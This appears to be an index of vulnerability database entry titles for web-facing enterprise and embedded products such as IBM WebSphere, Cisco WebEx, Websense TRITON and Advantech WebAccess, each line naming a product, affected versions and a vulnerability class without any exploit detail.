[76443] IBM WebSphere Portal Active Content Filtering cross site scripting
[76442] IBM WebSphere Portal up to 7.0.0.2 CF29/8.0.0.1 CF16/8.5.0 CF5 Java Content Repository information disclosure
[76419] Cisco WebEx Meeting Center cross site scripting
[76197] Apple Mac OS X 10.9.5/10.10/10.10.1/10.10.2/10.10.3 Bluetooth HCI Interface memory corruption
[76173] IBM WebSphere MQ up to 8.0.0.2 MQ Explorer TLS information disclosure
[76162] Cisco Unified Communications Domain Manager 8.1(4)ER1 Web Framework information disclosure
[76131] IBM WebSphere Commerce up to 6.0.0.11/7.0.0.8 HTTP Header privilege escalation
[76115] IBM Tivoli Security Directory Server up to 6.4 Web Admin Tool privilege escalation
[76103] IBM WebSphere Message Broker Toolkit MQ Client TLS weak encryption
[76098] IBM Unified Extensible Firmware Interface Legacy Boot Mode denial of service
[76091] Cisco Web Security Appliance SSH Host Key weak encryption
[76090] Cisco Web Security Appliance SSH Key information disclosure
[76071] Cisco WebEx Meeting Center Credentials information disclosure
[76070] Cisco WebEx Meeting Center sql injection
[76051] Cisco WebEx Meeting Center cross site scripting
[76050] Cisco WebEx Meeting Center Calendar information disclosure
[76049] Cisco WebEx Meeting Center Meeting Registration Page information disclosure
[76033] Cisco Web Security Appliance 8.5.0-497 Header cross site scripting
[76028] Cisco Web Security Appliance 8.5.0-497 HTTP Header cross site scripting
[76018] IBM Lotus Domino Web Server up to 8.5.3 FP6/9.0.1 FP3 WebMail cross site scripting
[76014] IBM WebSphere MQIPT up to 2.1.0.1 Session ID Generator Code
[75835] Magnifica Webscripts Anima Gallery 2.6 func.php directory traversal
[75676] SAP HANA Web-Based Development Workbench sql injection
[75662] Synology Photo Station 6.2-2858 /photo/webapi/photo.php sql injection
[75599] Cisco Identity Services Engine 1.2(1.901)/1.3(0.722) Web Framework information disclosure
[75594] AVM FRITZ!Box cgi-bin/webcm privilege escalation
[75522] IBM WebSphere Portal up to 8.0.0.1/8.5.0 Redirect
[75517] IBM WebSphere Portal up to 8.5 CF05 denial of service
[75512] Cisco TelePresence Web Framework privilege escalation
[75510] Cisco Hosted Collaboration Solution up to 10.6(1) Admin Interface privilege escalation
[75507] Huawei E355s Mobile WiFi up to 22.158 WebUI information disclosure
[75488] IBM WebSphere MQ up to 7.5.0.4/8.0.0.1 Cluster Repository Manager denial of service
[75424] Wireshark up to 1.12.4 WebSocket Dissector denial of service
[75415] Cisco Web Security Appliance 8.5.0-497 Web Tracking Report Page cross site scripting
[75390] Cisco WebEx Meetings Server 2.5/2.5.0.997 URL cross site scripting
[75230] Cisco Wireless LAN Controller 7.5.102.0/7.5.102.11/7.6.100.0 Web Authentication denial of service
[75197] IBM WebSphere Application Server 6.1/7.0/8.0/8.5/8.5.5 Service privilege escalation
[75148] Oxide WebServer up to 1.6.4 picker memory corruption
[75146] InFocus IN3128HD Projector 0.26 webctrl.cgi.elf privilege escalation
[75120] IBM WebSphere MQ up to 8.0.0.1 WMQ Telemetry cross site scripting
[75115] TinyWebGallery up to 1.8.7 admin/index.php cross site scripting
[75114] TinyWebGallery up to 1.8.7 admin/index.php cross site request forgery
[75099] IBM WebSphere Application Server 8.5 Run-as EJB race condition
[75098] IBM WebSphere Application Server 7.0/8.0/8.5/8.5.5 Oauth privilege escalation
[75097] IBM WebSphere Application Server 8.5 Liberty Profile privilege escalation
[75096] IBM WebSphere Application Server 8.5 SNMP information disclosure
[75095] IBM WebSphere Portal 6.1/6.1.5/7.0.0.2/8.0.0.1/8.5 cross site scripting
[75094] IBM WebSphere Portal 6.1/6.1.5/7.0.0.2/8.0.0.1/8.5 denial of service
[74984] Cisco IOS XR up to 5.3.0 on ASR 9000 Bridge-Group Virtual Interface Traffic Hang Data Processing Error
[74975] Cisco Web Security Appliance 8.5.0-497 cross site scripting
[74914] Oracle JD Edwards EnterpriseOne Technology 9.1 Web Runtime Security unknown vulnerability
[74890] Oracle WebCenter Portal 11.1.1.8.0 WebCenter Spaces Application unknown vulnerability
[74889] Oracle WebCenter Portal 11.1.1.8.0 Portlet Services unknown vulnerability
[74887] Oracle WebLogic Server 10.3.6.0/12.1.1.0/12.1.2.0 Console unknown vulnerability
[74886] Oracle WebCenter Sites 7.6.2/11.1.1.6.1/11.1.1.8.0 MultipartStream.java privilege escalation
[74885] Oracle WebCenter Sites 11.1.1.6.1/11.1.1.8.0 Community privilege escalation
[74882] Oracle WebLogic Server 12.1.2.0/12.1.3.0 WLS-WebServices unknown vulnerability
[74880] Oracle iPlanet Web Server 6.1/7.0 Network Security Service weak encryption
[74879] Oracle iPlanet Web Proxy Server 4.0 Network Security Service weak encryption
[74786] Juniper Junos up to 14.2 J-Web privilege escalation
[74780] pfSense up to 2.2.0 WebGUI system_firmware_restorefullbackup.php cross site request forgery
[74756] Apple MacOS X up to 10.10.2 WebKit denial of service
[74648] IBM WebSphere DataPower XC10 up to 2.1.0.2 privilege escalation
[74588] pfSense Firewall up to 2.2.0 WebGUI cross site scripting
[74584] OpenStack Compute up to 2014.2.2 Websocket weak authentication
[74571] Websense TRITON up to 7.x unknown vulnerability
[74570] Websense TRITON up to 7.x unknown vulnerability
[74569] Websense TRITON AP-EMAIL up to 7.x information disclosure
[74568] Websense TRITON up to 7.x cross site request forgery
[74566] Websense TRITON AP-EMAIL up to 7.x cross site scripting
[74565] Websense TRITON AP-EMAIL up to 7.x unknown vulnerability
[74564] Websense TRITON AP-EMAIL up to 7.x privilege escalation
[74563] Websense TRITON AP-EMAIL up to 7.x privilege escalation
[74562] Websense TRITON AP-DATA up to 7.x cross site scripting
[74561] Websense TRITON AP-EMAIL up to 7.x unknown vulnerability
[74560] Websense TRITON AP-WEB up to 7.x information disclosure
[74559] Websense TRITON AP-WEB up to 7.x cross site scripting
[74546] IBM Security Access Manager for Web up to 7.x information disclosure
[74529] Websense TRITON up to 7.8.2 information disclosure
[74492] Websense Web Security up to 7.x Explorer explorer_wse/ information disclosure
[74491] Websense Data Loss Prevention 7.8.3 cross site scripting
[74484] Websense TRITON AP-WEB up to 7.8.2 Data Security Block Page moreBlockInfo.cgi cross site scripting
[74483] Websense TRITON AP-EMAIL up to 7.8.2 cross site scripting
[74478] Websense TRITON AP-WEB up to 7.8.2 Explorer Report Scheduler WsCgiExplorerSchedule.exe cross site scripting
[74445] Web-Dorado Ecommerce Wd 1.2.5 Search index.php sql injection
[74411] IBM WebSphere Commerce up to 7.0 Privileges unknown vulnerability
[74340] Web-Dorado Spider Calendar 1.4.9 admin/ wp-admin/admin-ajax.php sql injection
[74332] Kent-web Clip Board up to 4.1 Web CLI unknown vulnerability
[74281] D-Link DIR-645 up to 1.04b12 Interface Wired/Wireless memory corruption
[74280] D-Link DIR-645 up to 1.04b12 Interface Wired/Wireless privilege escalation
[74245] Zarafa Collaboration Platform up to 7.1.10 WebAccess senddocument.php denial of service
[74234] Cisco Hosted Collaboration Solution SOAP Interface privilege escalation
[74200] IBM Tivoli Endpoint Manager up to 9.1.1116 Web Reports cross site scripting
[74185] IBM WebSphere Portal up to 7.0.0.0 cross site scripting
[74177] IBM WebSphere MQ up to 7.4 Privileges denial of service
[74167] Web-Dorado Spider Facebook up to 1.0.9 Facebook Plugin wp-admin/admin.php cross site scripting
[74129] Fabrice Bellard QEMU Websocket Frame Decoder denial of service
[74128] Viber 4.3.0.712 on Android Javascript Interface privilege escalation
[74094] Websense Triton 7.8.3 JSP URL Source information disclosure
[74093] Websense Triton 7.8.3 Explorer /explorer_wse File privilege escalation
[74062] Cisco WebEx Meetings Server 2.5 Administration Portal cross site scripting
[74060] Websense Triton 7.8.3 Data Security Block Page cross site scripting
[74059] Websense Triton 7.8.3 Explorer Report Scheduler cross site scripting
[74058] Websense Triton 7.8.3 Data Security DLP cross site scripting
[74057] Websense Email Security 7.8.3 cross site scripting
[73937] IBM WebSphere Portal 8.5 weak encryption
[73936] IBM WebSphere Portal 8.0/8.5 weak encryption
[73935] IBM WebSphere Portal 8.0/8.5 cross site request forgery
[73827] Web-Dorado Photo Gallery up to 1.2.8 sql injection
[73818] IBM WebSphere Message Broker up to 8.0.0.4 HTTPInput Node information disclosure
[73804] Jakweb Gecko CMS 2.2 cross site request forgery
[73803] Jakweb Gecko CMS 2.2 sql injection
[73802] Jakweb Gecko CMS 2.2 cross site scripting
[73698] Clorius Controls A Java Web Client up to 01.00.x information disclosure
[73673] Web-Dorado Photo Gallery 1.2.7 sql injection
[73517] EMC Documentum WDK up to 6.6 webtop Numeric Error
[73466] Efssoft Easy File Sharing Web Server 6.8 cross site scripting
[73414] Splunk Web up to 5.0.5 cross site scripting
[73367] IBM WebSphere Service Registry/Repository up to 7.5.0.2 cross site scripting
[73366] IBM WebSphere Service Registry/Repository up to 7.5.0.1 cross site request forgery
[73365] IBM WebSphere Service Registry/Repository up to 7.5.0.2 Access Restriction privilege escalation
[73364] IBM WebSphere Service Registry/Repository up to 7.0.0.1 Registry privilege escalation
[73363] IBM WebSphere Service Registry/Repository cross site scripting
[73362] IBM WebSphere Service Registry/Repository cross site scripting
[73361] IBM WebSphere Service Registry/Repository cross site scripting
[73360] IBM WebSphere Service Registry/Repository up to 7.5.0.1 Registry privilege escalation
[73359] IBM WebSphere Service Registry/Repository up to 7.5.0.4 Registry directory traversal
[73358] IBM WebSphere Service Registry/Repository up to 7.5.0.4 Registry weak encryption
[73357] IBM WebSphere Service Registry/Repository up to 7.5.0.4 cross site scripting
[73300] IBM WebSphere Portal up to 8.5.0.0 cross site scripting
[73299] IBM WebSphere Portal up to 8.5.0.0 privilege escalation
[73297] IBM WebSphere Portal up to 8.5.0.0 cross site scripting
[73295] IBM WebSphere Application Server up to 8.5.0.0 privilege escalation
[73294] IBM WebSphere Application Server up to 7.0.0.14 7PK Security Features
[73293] IBM WebSphere Application Server up to 7.0.0.14 cross site scripting
[73292] IBM WebSphere Application Server up to 8.0.0.6 XML External Entity
[73291] IBM WebSphere Application Server up to 8.0.0.6 information disclosure
[73290] IBM Security Access Manager for Web Data Processing Error
[73289] IBM Security Access Manager for Web information disclosure
[73288] IBM Security Access Manager for Web weak encryption
[73287] IBM Security Access Manager for Web information disclosure
[73286] IBM Security Access Manager for Web weak encryption
[73285] IBM Security Access Manager for Web information disclosure
[73284] IBM Security Access Manager for Web denial of service
[73283] IBM Security Access Manager for Web sql injection
[73282] IBM Security Access Manager for Web privilege escalation
[73281] IBM Security Access Manager for Web cross site request forgery
[73280] IBM Security Access Manager for Web 7PK Security Features
[73206] IBM WebSphere Portal up to 8.0.0.1 cross site scripting
[73197] Cisco Unified Communications Domain Manager 8.0 Web Framework privilege escalation
[73119] KENT-WEB Clip Board up to 2.91 cross site scripting
[72992] IBM WebSphere Portal up to 8.5.0.0 cross site scripting
[72967] Moodle up to 2.7.2 Web Service externallib.php privilege escalation
[72964] Moodle up to 2.7.2 Web Service grades_external.php information disclosure
[72841] webEdition CMS 6.3.8.0 showTempFile.php directory traversal
[72837] SAP HANA Web-based Development Workbench cross site scripting
[72810] IBM WebSphere Commerce up to 6.0.0.11 XML External Entity
[72808] IBM WebSphere Commerce up to 6.0.0.11 XML External Entity
[72754] Cisco Unified Communications Manager Admin Interface cross site scripting
[72740] IBM WebSphere Portal cross site scripting
[72739] IBM WebSphere Portal cross site request forgery
[72738] IBM WebSphere Portal up to 8.5.0.0 information disclosure
[72737] IBM WebSphere Portal up to 8.5.0.0 denial of service
[72736] IBM WebSphere Portal up to 7.0.0.0 memory corruption
[72663] Websupporter WP AmASIN - The Amazon Affiliate Shop up to 0.9.6 reviews.php directory traversal
[72395] Okacloud Domain Name Search / Web Host 0.64.13398.55733 X.509 Certificate weak encryption
[72150] IBM WebSphere MQ up to 8.0.0.0 weak authentication
[72125] IBM WebSphere Application Server up to 7.0.0.14 privilege escalation
[71972] Php Resource Voice Of Web AllMyGuests 0.4.1 admin.php sql injection
[71971] Php Resource Voice Of Web AllMyGuests 0.4.1 index.php cross site scripting
[71930] cloudacl Safe Browser - The Web Filter 1.2.5 X.509 Certificate weak encryption
[71914] IBM WebSphere Portal up to 8.0 information disclosure
[71775] IBM Security Access Manager For Web 8.0 up to 8.0.0.1 Administration Console privilege escalation
[71774] IBM Security Access Manager For Web 8.0 up to 8.0.0.1 denial of service
[71728] IBM WebSphere MQ Access Restriction privilege escalation
[71725] IBM WebSphere DataPower XC10 appliance Privileges information disclosure
[71724] IBM WebSphere DataPower XC10 appliance Administrative Console information disclosure
[71499] IBM WebSphere Application Server up to 7.0.0.15 Administrative Console cross site request forgery
[71498] IBM WebSphere Application Server up to 7.0.0.15 cross site scripting
[71363] Advantech WebAccess 7.2 memory corruption
[71362] Advantech WebAccess 7.2 memory corruption
[71361] Advantech WebAccess 7.2 memory corruption
[71360] Advantech WebAccess 7.2 memory corruption
[71359] Advantech WebAccess 7.2 memory corruption
[71358] Advantech WebAccess 7.2 memory corruption
[71357] Advantech WebAccess 7.2 memory corruption
[71356] Advantech WebAccess 7.2 memory corruption
[71354] Phorum up to 5.2.18 Admin Interface cross site scripting
[71225] IBM WebSphere Portal up to 8.0 denial of service
[71224] IBM WebSphere Portal up to 8.5.0.0 cross site scripting
[71223] Cisco Unified Communications Manager 9.1 Web Framework cross site scripting
[71194] Imperva SecureSphere Web Application Firewall 9.0 cross site scripting
[71071] Web Browser for Android 1.2 X.509 Certificate weak encryption
[70699] IBM WebSphere Application Server up to 8.5.0.1 privilege escalation
[70698] IBM WebSphere Application Server up to 8.0.0.6 denial of service
[70696] IBM WebSphere Application Server up to 7.0.0.14 privilege escalation
[70695] IBM WebSphere Application Server up to 8.0.0.6 Access Restriction privilege escalation
[70694] IBM WebSphere Application Server up to 7.0.0.14 information disclosure
[70693] IBM WebSphere Application Server up to 7.0.0.14 information disclosure
[70674] EMC Documentum Webtop up to 6.6 cross site request forgery
[70672] EMC Documentum WebTop up to 6.6 cross site scripting
[70634] IBM Websphere Datapower Soa Appliance up to 5.0.0 weak encryption
[70588] IBM WebSphere Real Time memory corruption
[70580] Cisco Unity Connection up to 9.1 Web Framework sql injection
[70555] IPython Notebook up to 1.1.0 WebSocket privilege escalation
[70542] Efssoft Easy File Sharing Web Server 6.8 cross site scripting
[70509] IBM WebSphere Portal up to 7.0.0.2 cross site scripting
[70508] IBM WebSphere Portal up to 7.0.0.2 information disclosure
[70507] IBM WebSphere Portal up to 7.0.0.2 sql injection
[70506] IBM WebSphere Portal up to 7.0.0.2 Redirect
[70391] Advantech WebAccess 5.0/6.0/7.0/7.1 ActiveX Control information disclosure
[70390] Advantech WebAccess 5.0/6.0/7.0/7.1 ActiveX Control information disclosure
[70389] Advantech WebAccess 5.0/6.0/7.0/7.1 upAdminPg.asp information disclosure
[70388] Advantech WebAccess 5.0/6.0/7.0/7.1 unknown vulnerability
[70387] Advantech WebAccess 5.0/6.0/7.0/7.1 ActiveX Control webvact.ocx memory corruption
[70147] IBM WebSphere Application Server up to 7.0.0.14 information disclosure
[70129] IBM Security Access Manager For Mobile Software up to 8.0 Management Interface weak authentication
[70128] IBM Security Access Manager For Web Appliance 8.0 Configuration
[70088] IBM WebSphere Portal up to 7.0.0.0 cross site scripting
[70041] webEdition CMS 6.2.7.0/6.3.3.0/6.3.8.0 we_fs.php sql injection
[69975] Cisco Unified Communications Domain Manager Web Framework privilege escalation
[69974] Cisco Unified Communications Domain Manager Web Framework privilege escalation
[69871] IBM WebSphere Service Registry/Repository up to 7.5.0.3 cross site scripting
[69860] Cisco Unified Communications Domain Manager up to 9.0 Web Framework unknown vulnerability
[69801] Cisco NX-OS up to 6.x Management Interface privilege escalation
[69795] IBM WebSphere Commerce up to 7.0 privilege escalation
[69761] IBM WebSphere Portal up to 7.0.0.1 privilege escalation
[69760] IBM WebSphere Portal up to 7.0.0.1 Redirect
[69754] Efssoft Easy File Sharing Web Server 6.8 memory corruption
[69727] Mahara up to 1.7.2 lib/web.php cross site scripting
[69707] IBM WebSphere Portal up to 7.0.0.0 directory traversal
[69706] IBM WebSphere Portal up to 7.0.0.0 cross site scripting
[69656] Netweblogic Events Manager up to 5.2 index.php cross site scripting
[69587] Red Hat JBoss Web Framework Kit 2.5.0 cross site scripting
[69560] IBM WebSphere Application Server up to 8.5.0.1 information disclosure
[69559] IBM WebSphere Application Server up to 7.0.0.14 denial of service
[69558] IBM WebSphere Application Server up to 8.0.0.6 Administrative Console information disclosure
[69557] IBM WebSphere Application Server up to 8.0.0.6 information disclosure
[69556] IBM WebSphere Application Server up to 7.0.0.26 Administration Console cross site scripting
[69437] KnowledgeTree 3.7/3.7.0.1/3.7.0.2 WebService getFileName sql injection
[69429] Craig Knudsen WebCalendar up to 1.2.6 category.php cross site scripting
[69323] Advantech WebAccess 5.0/6.0/7.0/7.1 ActiveX Control bwocxrun.ocx unknown vulnerability
[69322] Advantech WebAccess 5.0/6.0/7.0/7.1 ActiveX Control bwocxrun.ocx information disclosure
[69321] Advantech WebAccess 5.0/6.0/7.0/7.1 ActiveX Control bwocxrun.ocx information disclosure
[69320] Advantech WebAccess 5.0/6.0/7.0/7.1 memory corruption
[69319] Advantech WebAccess 5.0/6.0/7.0/7.1 memory corruption
[69318] Advantech WebAccess 5.0/6.0/7.0/7.1 memory corruption
[69317] Advantech WebAccess 5.0/6.0/7.0/7.1 memory corruption
[69316] Advantech WebAccess 5.0/6.0/7.0/7.1 memory corruption
[69315] Advantech WebAccess 5.0/6.0/7.0/7.1 memory corruption
[69314] Advantech WebAccess 5.0/6.0/7.0/7.1 DBVisitor.dll sql injection
[69312] Websense Triton Web Filter up to 7.7.2 Settings Module privilege escalation
[69203] Cisco Web Security Appliance URL privilege escalation
[69196] Cisco Web Security Appliance Proxy Engine information disclosure
[69194] Cisco Web Security Appliance Administrator Report Page cross site scripting
[69188] Netgear WNDR Router SOAP Interface Password information disclosure
[69173] Webmin 1.720 Read Mail Module File privilege escalation
[69171] Cisco ASA WebVPN denial of service
[69103] Cisco TelePresence IX5000 Web Portal privilege escalation
[69062] Cisco WebEx Meetings Server 1.0/1.1/1.5 privilege escalation
[69032] Cisco WebEx Meetings Server information disclosure
[69018] Cisco WebEx Meeting Center T29.6 Session information disclosure
[69016] Cisco WebEx Meetings Server 1.5 Invite List privilege escalation
[69013] Cisco WebEx Meeting Center T29.11 fileURI information disclosure
[68999] Cisco WebEx Meetings Server 1.5 Username information disclosure
[68998] Cisco WebEx Meetings Server 1.5 Orion Admin cross site request forgery
[68997] Cisco WebEx Meetings Server 1.5 XML API LstsummarySession information disclosure
[68725] Oracle Siebel UI Framework 8.1.1/8.2.2 AX/HI Web UI unknown vulnerability
[68705] Oracle E-Business Suite up to 12.2.4 Web Applications Desktop Integrator unknown vulnerability
[68692] Oracle Enterprise Manager Ops Center 11.1.3/12.1.4 User Interface Framework unknown vulnerability
[68681] Oracle Business Intelligence Enterprise Edition 10.1.3.4.2/11.1.1.7 Analytics Web General information disclosure
[68680] Oracle WebCenter Content 11.1.1.8.0 unknown vulnerability
[68677] Oracle HTTP Server 11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener denial of service
[68676] Oracle HTTP Server 11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener memory corruption
[68675] Oracle HTTP Server 11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener parser.c xmlParserHandlePEReference denial of service
[68669] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 CIE Related Components information disclosure
[68668] Oracle HTTP Server 10.1.3.5.0/11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener privilege escalation
[68667] Oracle HTTP Server 10.1.3.5.0/11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener privilege escalation
[68666] Oracle HTTP Server 10.1.3.5.0/11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener privilege escalation
[68665] Oracle HTTP Server 11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener memory corruption
[68659] Oracle HTTP Server 11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener memory corruption
[68658] Oracle HTTP Server 10.1.3.5.0/11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener mod_status.c lua_ap_scoreboard_worker race condition
[68657] Oracle WebLogic Server 10.3.6.0/12.1.1.0/12.1.2.0/12.1.3.0 WLS Config/WLS Console privilege escalation
[68656] Oracle WebLogic Portal 10.0.1.0/10.2.1.0/10.3.6.0 Third Party Tools commons-beanutils-1.8.0.jar privilege escalation
[68650] Oracle HTTP Server 11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener Numeric Error
[68616] Cisco WebEx Meetings Server 1.5 Login Page Captcha privilege escalation
[68590] Microsoft Windows up to Vista TS WebProxy directory traversal
[68571] Citrix Netscaler 10.0/10.1/10.5 Management Interface memory corruption
[68526] Cisco WebEx Meetings Server 1.5 URL weak authentication
[68525] Cisco WebEx Meetings Server 1.5 sendPwMail.do OutlookAction information disclosure
[68524] Cisco WebEx Meetings Server 1.5 cross site request forgery
[68523] Cisco WebEx Meetings Server 1.5 sendPwMail.do cross site scripting
[68492] Digium Asterisk up to 13.0.1 WebSocket Server denial of service
[66740] IBM Websphere Mq Internet Pass Thru Administration denial of service
[66704] McAfee Web Gateway up to 7.4.0 Web Filtering Port directory traversal
[66673] IBM InfoSphere Information Server up to 9.1.2 Interfaces cross site scripting
[66672] IBM InfoSphere Information Server up to 9.1.2 Interfaces sql injection
[66518] IBM WebSphere Portal up to 8.0.0.1 privilege escalation
[66489] IBM WebSphere MQ up to 7.4 directory traversal
[66425] IBM WebSphere eXtreme Scale Client up to 8.6.0.4 Web Container privilege escalation
[66370] IBM Connections Portlets up to 4.4 IBM WebSphere Portal cross site scripting
[66369] IBM WebSphere Dashboard Framework 7.0.1 privilege escalation
[66368] IBM WebSphere Portal up to 8.0.0.1 privilege escalation
[66291] Lexmark C935dn Lc.jo.p091 Embedded Web Server cross site scripting
[66204] GE up to 8.1 CimWebServer.exe directory traversal
[66203] GE up to 8.2 Web Components gefebt.exe directory traversal
[65977] web2ldap up to 1.1.48 Administration cross site scripting
[65903] HP Service Manager Web Tier up to 9.20 cross site scripting
[65902] HP Service Manager Web Tier up to 9.20 memory corruption
[65807] IBM Security Access Manager For Web 6.1 weak encryption
[65801] Cisco WebEx Training Center privilege escalation
[65795] Cisco WebEx Training Center information disclosure
[65794] Cisco WebEx Training Center information disclosure
[65793] Cisco WebEx Training Center privilege escalation
[65792] Cisco WebEx Meeting Center Error Message information disclosure
[65791] Cisco WebEx Training Center privilege escalation
[65790] Cisco WebEx Training Center information disclosure
[65789] Cisco WebEx Sales Center Subsystem privilege escalation
[65788] Cisco WebEx Training Center Access Restriction privilege escalation
[65787] Cisco WebEx Meeting Center privilege escalation
[65786] Cisco WebEx Training Center cross site scripting
[65785] Cisco WebEx Meeting Center Subsystem cross site scripting
[65784] Cisco WebEx Meeting Center cross site scripting
[65783] Cisco WebEx Meeting Center cross site scripting
[65782] Cisco WebEx Sales Center privilege escalation
[65781] Cisco WebEx Sales Center cross site scripting
[65780] Cisco WebEx Training Center cross site request forgery
[65779] Cisco WebEx Training Center Access Restriction information disclosure
[65757] SAP Network Interface Router 39.3 weak authentication
[65708] Enorth Webpublisher CMS up to 5.0 sql injection
[65644] Cybozu Garoon up to 3.7 User Interface cross site scripting
[65512] SAP Network Interface Router 7.30 memory corruption
[65438] Juniper Junos up to 12.3 J-Web privilege escalation
[65403] Openbravo Openbravo ERP up to 2.50 Interfaces privilege escalation
[65326] Cisco Unity Connection Web Service directory traversal
[65302] IBM WebSphere eXtreme Scale 8.6.0 Monitoring privilege escalation
[65301] IBM WebSphere eXtreme Scale 8.6.0 Monitoring unknown vulnerability
[65300] IBM WebSphere eXtreme Scale 8.6.0 Monitoring cross site scripting
[65216] Cisco Unified Computing System Management Interface cross site request forgery
[65177] Cisco Wireless LAN Controller Management Interface cross site scripting
[65170] Cisco Unified Computing System Management Interface privilege escalation
[65168] Cisco Unified Communications Domain Manager Web Framework sql injection
[65166] IBM InfoSphere Information Server up to 8.1 Web Console privilege escalation
[65112] IBM Rational ClearQuest up to 7.1.0.0 Web Client information disclosure
[65061] Red Hat libvirt 1.0.6 Interfaces denial of service
[65046] IBM Websphere Datapower Xc10 Appliance up to 2.1.0.3 privilege escalation
[65037] Cisco Unified Computing System Management Interface privilege escalation
[65030] Open-Xchange AppSuite 7.0.1/7.0.2/7.2.0/7.2.1 Interfaces information disclosure
[65011] Cisco Unified Computing System Intelligent Platform Management Interface privilege escalation
[64987] Cisco up to 8.5 Web Framework weak authentication
[64859] Cisco WebEx Recording Format Player up to 27.25.9 Exception memory corruption
[64836] Palo Alto PAN-OS up to 4.1.3 Web Management weak authentication
[64742] Advantech WebAccess 5.0/6.0/7.0 cross site scripting
[64673] IBM InfoSphere Information Server up to 8.1 Web Console cross site scripting
[64672] IBM InfoSphere Information Server up to 8.1 User Interface cross site scripting
[64609] Cisco Unified Communications Manager Web Portal information disclosure
[64595] GE up to 8.1 CimWebServer.exe memory corruption
[64536] Cisco Unified MeetingPlace Web Conferencing Access Restriction privilege escalation
[64508] WordPress up to 3.3.1 swfupload.swf "ExternalInterfacecall" cross site scripting
[64469] Cisco Unified MeetingPlace Web Conferencing cross site scripting
[64468] Cisco Unified Communications Domain Manager Management Interface denial of service
[64335] Cisco Prime Central for Hosted Collaboration Solution Web Framework information disclosure
[64317] IBM Sterling Connect Direct User Interface up to 1.4.0.10 privilege escalation
[64132] Netweblogic Login With Ajax up to 2.0 cross site request forgery
[64129] EMC Documentum Webtop up to 6.6 privilege escalation
[64128] EMC Documentum Webtop up to 6.6 cross site scripting
[64127] EMC Documentum Webtop up to 6.6 weak authentication
[64064] HP Service Manager Web Tier up to 9.30 cross site scripting
[64063] HP Service Manager Web Tier up to 9.30 information disclosure
[64044] Cisco Unified Communications Domain Manager Web Framework cross site scripting
[64043] IBM Lotus Sametime up to 8.5.1 Web Client unknown vulnerability
[63859] Moodle up to 2.4.1 WebDAV lib.php information disclosure
[63840] IBM Rational ClearQuest up to 8.0.0.0 Web Client cross site scripting
[63689] IBM Tivoli Application Dependency Discovery Manager User Interface Welcome.do cross site scripting
[63685] Thekelleys Dnsmasq up to 2.63 Interfaces denial of service
[63684] Thekelleys Dnsmasq up to 2.32 Interfaces denial of service
[63520] Cisco Webex Social search information disclosure
[63488] Samba up to 3.5.18 Web Administration Tool privilege escalation
[63429] TP-LINK TL-WR841N -/3.13.9 Management Interface directory traversal
[63386] Cisco WebEx Training Center privilege escalation
[63385] Cisco WebEx Training Center privilege escalation
[63378] Cisco NX-OS on Nexus 7000 Interfaces denial of service
[63361] GE up to 8.0 CimWebServer.exe Numeric Error
[63360] Cisco WebEx Training Center testingLibraryAction.do cross site request forgery
[63229] Oracle Glassfish Web Space Server 10.0 directory traversal
[63224] IBM WebSphere Application Server privilege escalation
[63219] IBM Rational ClearQuest up to 7.1.1 Web Client cross site scripting
[63215] Cisco 2100 Wireless LAN Controller 7.2.110.0 web_auth_custom.html denial of service
[63167] KENT-WEB ACCESS REPORT up to 5.02 Web Access cross site scripting
[63166] KENT-WEB ACCESS REPORT up to 4.2 Web Access cross site scripting
[63103] Ps Project Management Team libunity-webapps up to 2.4.0 Hash Tables denial of service
[62760] Cisco WebEx Recording Format Player up to 27.25.9 memory corruption
[62687] Craig Knudsen WebCalendar up to 1.2.4 privilege escalation
[62686] Craig Knudsen WebCalendar edit_entry_handler.php cross site scripting
[62648] TinyWebGallery 1.8.3 memory corruption
[62622] K5n WebCalendar 1.2.4 cross site scripting
[62597] SpamTitan WebTitan 3.50 logs-x.php directory traversal
[62596] SpamTitan WebTitan 3.50 traceroute tools.php privilege escalation
[62595] SpamTitan WebTitan 3.50 Login login-x.php sql injection
[62545] Akiva WebBoard 2.90/8.0 sql injection
[62430] IBM WebSphere Commerce denial of service
[62429] IBM WebSphere Commerce 7.0 denial of service
[62337] Moodle up to 2.3.1 WebService webservice/lib.php privilege escalation
[62241] Gentoo Webmin up to 1.590 cross site request forgery
[62114] Litespeedtech LiteSpeed Web Server 4.1.11 cross site scripting
[62103] Com Weblinks up to 1.0.9 on Joomla sql injection
[61956] IBM WebSphere Application Server up to 6.1.0.10 privilege escalation
[61875] Websense Web Security denial of service
[61874] Websense Email Security up to 6.0 Access Restriction privilege escalation
[61873] Websense Email Security up to 6.0 memory corruption
[61777] Kajianwebsite CMS Balitbang 3.0 alumni.php sql injection
[61768] Websense Web Security up to 6.3.2 Management Console weak authentication
[61766] Websense Web Security up to 6.3.2 denial of service
[61765] Websense Web Security information disclosure
[61764] Websense Web Security up to 6.3.2 denial of service
[61762] Websense Web Security memory corruption
[61761] Websense Web Security up to 6.3.3 Monitoring privilege escalation
[61760] Websense Email Security up to 7.0 information disclosure
[61759] Websense Email Security up to 7.0 privilege escalation
[61758] Websense Web Security 7.0 Default Configuration
[61757] Websense Web Security 7.0 Default Configuration
[61682] IBM Rational ClearQuest up to 7.1.1 Web Client cross site scripting
[61611] Netweblogic Login With Ajax up to 2.1.0 cross site scripting
[61571] C4B Xphone Unified Communications 2011 4.1.890s Web Frontend cross site scripting
[61544] WinWebMail WinWebMail Server 3.8.1.6 cross site scripting
[61472] Siemens Synco OZW Web Server up to Ozw772.249 Default Password privilege escalation
[61455] Dell Sonicwall Scrutinizer With Flow Analytics Module up to 8.6.1 Web Console cross site scripting
[61450] Dell Sonicwall Scrutinizer With Flow Analytics Module up to 8.6.1 Web Console cross site scripting
[61447] IBM Scale Out Network Attached Storage up to 1.3.1 Command Line Interface privilege escalation
[61357] IBM Lotus Protector for Mail Security 2.8 User Interface cross site scripting
[61344] Moodle up to 2.1.2 User Interface mod/wiki/pagelib.php information disclosure
[61318] Moodle up to 2.2 WebService Configuration
[61298] Moodle up to 1.9.11 lib/weblib.php cross site scripting
